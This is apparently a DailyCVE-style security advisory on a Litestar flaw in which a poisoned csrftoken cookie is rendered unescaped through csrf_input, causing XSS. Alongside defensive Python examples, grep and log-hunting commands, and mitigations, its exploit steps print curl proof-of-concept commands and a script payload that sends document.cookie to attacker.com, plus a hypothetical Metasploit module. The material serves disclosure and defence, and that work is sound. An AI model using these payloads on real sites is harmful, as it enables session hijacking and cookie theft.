Litestar, HTML Injection leading to XSS, CVE(N/A) (Medium) -DC-Jun2026-387


Intro

The vulnerability affects Litestar applications that enable CSRF protection and render forms through a template engine (Jinja2, Mako or MiniJinja) using the `csrf_input` template variable. When CSRF protection is enabled, Litestar issues a `csrftoken` cookie and exposes `csrf_input`, a ready-made hidden `<input>` element whose `value` is the token read back from that cookie. Because the variable already contains HTML, the framework's documentation recommends inserting `{{ csrf_input | safe }}` inside forms; the `safe` filter disables Jinja2's automatic escaping for that expression, so whatever the cookie holds is written into the page verbatim.
An attacker can therefore set a malicious `csrftoken` cookie containing arbitrary HTML or JavaScript, for example `"><script>alert(1)</script>`: the leading `">` closes the `value` attribute and the `<input>` tag, and the rest is parsed as new markup. On the next request to a page that renders a form with `csrf_input`, the payload lands in the DOM without sanitisation. This is HTML injection that escalates directly to cross-site scripting (XSS), because the injected script tag executes in the victim's browser.
The attack can be delivered remotely when the attacker is able to plant the cookie for the target site in the victim's browser, e.g. from a malicious or compromised sibling subdomain under the same registrable domain, or by abusing an insecure cookie `Domain` configuration. Once the victim visits the vulnerable page, the injected script runs in the application's origin, allowing session theft, credential harvesting or phishing.
Litestar versions prior to the patch, including the tested 2.21.0, are affected. The root cause is that the cookie value is embedded in `csrf_input` without output encoding, and the `| safe` filter the helper needs in order to render at all also hands attacker-controlled input straight to the browser. No input validation or output encoding is applied to the cookie value before insertion.
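To make the mechanism concrete, the following is an added illustration (it is neither Litestar's code nor part of the original write-up) that models how the hidden input is built from the cookie value, what rendering it `| safe` does to a poisoned value, and how attribute-escaping or format-checking the token neutralises it. The `_csrf_token` field name, the hex token format and the surrounding page markup are assumptions made for the example:

```python
import html
import re
from html.parser import HTMLParser

# Constructed inputs: a well-formed token (Litestar issues hex tokens; the exact
# length is assumed here) and the value an attacker plants in the cookie.
GOOD_TOKEN = "9f1c" * 16
EVIL_TOKEN = '"><script>alert(1)</script>'

# Name of the hidden form field; assumed for this example.
FIELD_NAME = "_csrf_token"

_TOKEN_RE = re.compile(r"[0-9a-f]+")  # assumed alphabet of a genuine token


def csrf_input_unsafe(token: str) -> str:
    """Model of the vulnerable behaviour: the cookie value is interpolated into
    the <input> element as-is, and the template marks the whole string `| safe`,
    so the engine's auto-escaping never sees it."""
    return f'<input type="hidden" name="{FIELD_NAME}" value="{token}" />'


def csrf_input_hardened(token: str) -> str:
    """Escape the value for an HTML attribute context; a poisoned cookie becomes
    inert text inside value="..." even though the result is still marked safe."""
    return f'<input type="hidden" name="{FIELD_NAME}" value="{html.escape(token, quote=True)}" />'


def csrf_token_is_well_formed(token: str) -> bool:
    """Alternative defence: reject anything that is not a hex token (assumed
    format) before it is ever handed to a template."""
    return _TOKEN_RE.fullmatch(token) is not None


def render_form_page(cookie_value: str, hardened: bool) -> str:
    """Assemble a minimal page the way a form template would: the static markup
    is authored HTML, only the csrf_input expression carries the cookie value."""
    csrf_input = csrf_input_hardened(cookie_value) if hardened else csrf_input_unsafe(cookie_value)
    return (
        '<html><body><form method="post" action="/submit">\n'
        f"{csrf_input}\n"
        '<input type="text" name="comment" />\n'
        '<button type="submit">Send</button>\n'
        "</form></body></html>"
    )


class _TagCounter(HTMLParser):
    """Counts <script> start tags: a robust check that the reflected cookie
    produced a new element rather than staying attribute text."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1


def count_script_tags(document: str) -> int:
    parser = _TagCounter()
    parser.feed(document)
    parser.close()
    return parser.script_tags


if __name__ == "__main__":
    for label, hardened in (("vulnerable", False), ("hardened", True)):
        page = render_form_page(EVIL_TOKEN, hardened)
        print(f"{label}: {count_script_tags(page)} <script> element(s)")
        print(page, end="\n\n")
    print("well-formed?", csrf_token_is_well_formed(GOOD_TOKEN), csrf_token_is_well_formed(EVIL_TOKEN))
```

Parsing the rendered page with a real HTML parser, rather than grepping for the string "script", is the reliable way to tell an injected element apart from a harmlessly encoded attribute value when triaging PoC output.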

DailyCVE Form:

Platform: Litestar (Python web framework)
Version: ≤ 2.21.0 (unpatched)
Vulnerability: HTML injection → XSS (via `csrftoken` cookie)
Severity: Medium (requires cookie poisoning plus the documented `{{ csrf_input | safe }}` template pattern)
Date: 2024 (disclosed after responsible process)

Prediction: Patch expected within 30 days of disclosure

What Undercode Say:

The following commands check whether an application uses the vulnerable pattern, confirm the reflection, and hunt for poisoning attempts in web-server logs:

# Find templates that mark csrf_input as safe, and code that enables CSRF protection
grep -rE "csrf_input *\| *safe" templates/
grep -r "CSRFConfig" --include="*.py" .

# Confirm that a crafted cookie value is echoed unescaped (PoC; GET is a CSRF-safe method, so the cookie is never validated, only reflected)
curl -s -b 'csrftoken="><script>alert(1)</script>' http://target:8000/ | grep -F '"><script>'

# Hunt for non-token characters in logged csrftoken values (only works if log_format includes $http_cookie; nginx does not log cookies by default, and escapes a raw " as \x22)
sudo grep "csrftoken=" /var/log/nginx/access.log | grep -E '(%3C|%3E|\\x22|<|script|onerror)'

# Metasploit auxiliary module (hypothetical; no such module ships with Metasploit)
use auxiliary/gather/litestar_csrf_xss
set RHOSTS target.com
set SRVHOST attacker.com
run
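As a worked version of the log hunt above, the following added example (not from the original post) parses constructed nginx access-log lines and flags `csrftoken` values that the framework could not have issued. It assumes a `log_format` that appends `"$http_cookie"` as the last quoted field (nginx does not log the Cookie header by default) and that genuine tokens are lowercase hex; it undoes both URL-encoding and the `\xHH` escaping nginx applies to `"` and `\` in log fields, so a raw and a percent-encoded payload are caught alike:

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed log lines. Format assumed: the standard "combined" format with
# "$http_cookie" appended as a final quoted field.
SAMPLE_LOG: List[str] = [
    '203.0.113.5 - - [12/Jun/2026:10:00:01 +0000] "GET /form-page HTTP/1.1" 200 1532 '
    '"csrftoken=9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c9f1c; session=s1"',
    '198.51.100.7 - - [12/Jun/2026:10:00:02 +0000] "GET /form-page HTTP/1.1" 200 1601 '
    '"csrftoken=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"',
    # nginx's default escaping writes a raw double quote in a header as \x22
    '198.51.100.9 - - [12/Jun/2026:10:00:03 +0000] "GET /form-page HTTP/1.1" 200 1601 '
    r'"session=s2; csrftoken=\x22><img src=x onerror=alert(1)>"',
    '203.0.113.6 - - [12/Jun/2026:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 9911 "-"',
]

_LINE_RE = re.compile(r'^(?P<ip>\S+) .* "(?P<cookies>[^"]*)"$')
_NGINX_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")
_TOKEN_RE = re.compile(r"[0-9a-f]+")  # assumed alphabet of a genuine token
COOKIE_NAME = "csrftoken"  # Litestar's default CSRF cookie name


def decode_logged_value(value: str) -> str:
    """Undo nginx's \\xHH escaping, then URL-decoding, to recover what the
    client actually sent."""
    unescaped = _NGINX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), value)
    return unquote(unescaped)


def csrf_cookie_from_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (client_ip, raw logged csrftoken value), or None when the line
    carries no such cookie."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    for part in m.group("cookies").split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == COOKIE_NAME:
            return m.group("ip"), value
    return None


def find_poisoned_tokens(lines) -> List[Tuple[str, str]]:
    """Return (client_ip, decoded value) for every csrftoken that is not a plain
    hex token, i.e. a candidate cookie-poisoning or probing attempt."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        found = csrf_cookie_from_line(line)
        if found is None:
            continue
        ip, raw = found
        decoded = decode_logged_value(raw)
        if _TOKEN_RE.fullmatch(decoded) is None:
            hits.append((ip, decoded))
    return hits


if __name__ == "__main__":
    for ip, value in find_poisoned_tokens(SAMPLE_LOG):
        print(f"{ip}: {value!r}")
```

Matching on "not a well-formed token" rather than on a keyword list such as `script` or `img` means encoded, obfuscated or event-handler payloads are all surfaced, at the cost of also flagging clients with corrupted cookies, which is an acceptable trade-off for a hunt.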

Exploit:

  1. Poison the `csrftoken` cookie in the victim's browser (requires the ability to set cookies for the target site, e.g. from a malicious sibling subdomain under the same registrable domain or via a related vulnerability).
  2. Lure the victim to a vulnerable Litestar endpoint that renders a form with {{ csrf_input | safe }}.
  3. The injected payload (e.g., "><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>) executes in the application's origin.
    Manual check of the reflection with `curl` and a crafted cookie (this only proves that the server echoes the cookie value unescaped; the real attack relies on the victim's browser sending the poisoned cookie, and no extra request headers are needed):

    curl -X GET http://vulnerable-app.com/form-page \
      -b "csrftoken=\"><script>alert('XSS')</script>"
    

Protection:

  • Immediate: do not simply drop `| safe` from `{{ csrf_input | safe }}`; the variable is a complete `<input>` element, so without `safe` the tag is displayed as literal text and the form stops working. Until a fixed release is available, write the hidden field yourself and render only the token value through a normal auto-escaped `{{ ... }}` expression, or reject requests whose `csrftoken` cookie is not a well-formed token before any template is rendered.
  • Long-term: upgrade Litestar once a patched version (> 2.21.0) is released. The fix must escape (or validate) the cookie value before it is embedded in `csrf_input`.
  • Defense in depth: set `cookie_secure=True`, `cookie_httponly=True` and `cookie_samesite="strict"` in `CSRFConfig`. Note that `HttpOnly` and `SameSite` do not stop a sibling subdomain from planting the cookie; for an HTTPS-only application, also use the `__Host-` cookie-name prefix (`cookie_name="__Host-csrftoken"`), which browsers refuse to accept from subdomains or with a `Domain` attribute.
  • Deploy a Content Security Policy without `unsafe-inline` (nonce- or hash-based `script-src`) so that injected inline scripts do not execute even if the injection succeeds.
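To check the cookie attributes concretely, here is an added example (it is not Litestar code, nor the post's own) that audits a `Set-Cookie` header for the properties that matter against cookie tossing: the `__Host-` prefix with its mandatory `Secure`, no `Domain` and `Path=/`, plus `HttpOnly` and `SameSite=Strict`. The sample headers are constructed: one mirrors the attributes Litestar's default `CSRFConfig` produces, one the hardened settings above, and one shows a misconfigured prefix that a browser would silently reject:

```python
from typing import Dict, List, Tuple

# Constructed Set-Cookie headers. The first reflects CSRFConfig's defaults
# (cookie_secure=False, cookie_httponly=False, cookie_samesite="lax"), the
# second the hardened settings, the third a __Host- cookie that breaks the
# prefix rules by carrying a Domain attribute and lacking Secure.
DEFAULT_HEADER = "csrftoken=9f1c9f1c9f1c9f1c; Path=/; SameSite=lax"
HARDENED_HEADER = "__Host-csrftoken=9f1c9f1c9f1c9f1c; Path=/; Secure; HttpOnly; SameSite=strict"
BROKEN_PREFIX_HEADER = "__Host-csrftoken=9f1c9f1c9f1c9f1c; Path=/; Domain=example.com; HttpOnly; SameSite=strict"


def parse_set_cookie(header: str) -> Tuple[str, Dict[str, str]]:
    """Split a Set-Cookie header into the cookie name and a lower-cased
    attribute map; flag attributes (Secure, HttpOnly) map to an empty string."""
    first, *attrs = [p.strip() for p in header.split(";")]
    name = first.partition("=")[0]
    attributes: Dict[str, str] = {}
    for attr in attrs:
        key, _, value = attr.partition("=")
        attributes[key.lower()] = value
    return name, attributes


def audit_csrf_cookie(header: str) -> List[str]:
    """Return findings for a CSRF cookie header; an empty list means the cookie
    cannot be planted from a sibling subdomain and carries the attributes the
    page recommends."""
    name, attrs = parse_set_cookie(header)
    findings: List[str] = []
    if "secure" not in attrs:
        findings.append("missing Secure: cookie also travels over plaintext HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by script on any same-origin page")
    if attrs.get("samesite", "").lower() != "strict":
        findings.append("SameSite is not Strict")
    if "domain" in attrs:
        findings.append("Domain attribute set: cookie is shared with every subdomain")
    if name.startswith("__Host-"):
        # Browsers drop a __Host- cookie that violates the prefix rules, so a
        # misconfigured prefix silently breaks CSRF validation for every form.
        if "secure" not in attrs or "domain" in attrs or attrs.get("path") != "/":
            findings.append("__Host- prefix rules violated (needs Secure, no Domain, Path=/): browser will reject the cookie")
    else:
        findings.append("no __Host- prefix: a sibling subdomain can plant a cookie with the same name")
    return findings


if __name__ == "__main__":
    for label, header in (("default", DEFAULT_HEADER), ("hardened", HARDENED_HEADER), ("broken prefix", BROKEN_PREFIX_HEADER)):
        print(f"{label}: {audit_csrf_cookie(header) or ['ok']}")
```

Run it against the `Set-Cookie` header captured from `curl -I` on a form page after a deployment change; the `__Host-` check in particular catches the case where hardening the name without also setting `cookie_secure=True` leaves users unable to submit any form.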

Impact:

  • Arbitrary JavaScript execution (XSS) → session hijacking, cookie theft, keylogging.
  • HTML injection → defacement, phishing forms, clickjacking.
  • Attackers can read CSRF tokens from the DOM and bypass CSRF protections on other forms.
  • Credential theft if injected fake login forms overlay legitimate content.
  • All Litestar apps using both CSRF protection and the documented template pattern are affected.


Sources:

Reported By: github.com